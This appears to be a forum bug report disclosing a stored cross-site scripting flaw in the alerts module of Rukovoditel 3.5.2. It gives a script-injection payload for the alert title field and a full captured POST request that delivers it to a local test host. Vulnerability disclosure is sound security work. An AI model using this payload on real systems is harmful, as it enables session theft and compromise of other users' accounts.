I found an xss vulnerability in the users_alerts module.
In the title parameter when creating an alert for all users, you can insert a payload.
Payload: "/><script>alert(document.cookie)</script>.
Request:
Code: Select all
POST /index.php?module=users_alerts/users_alerts&action=save&id=1&token=QRVySyiI7t HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded
Cookie: [cookie]
Upgrade-Insecure-Requests: 1
form_session_token=QRVySyiI7t&is_active=1&type=warning&title=qwerty%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eqwerty&description=qwerty&location=all&start_date=2024-04-08&end_date=2024-04-10&users_groups%5B%5D=0&users_groups%5B%5D=6&assigned_to%5B%5D=1&assigned_to%5B%5D=2
I have used Rukovoditel 3.5.2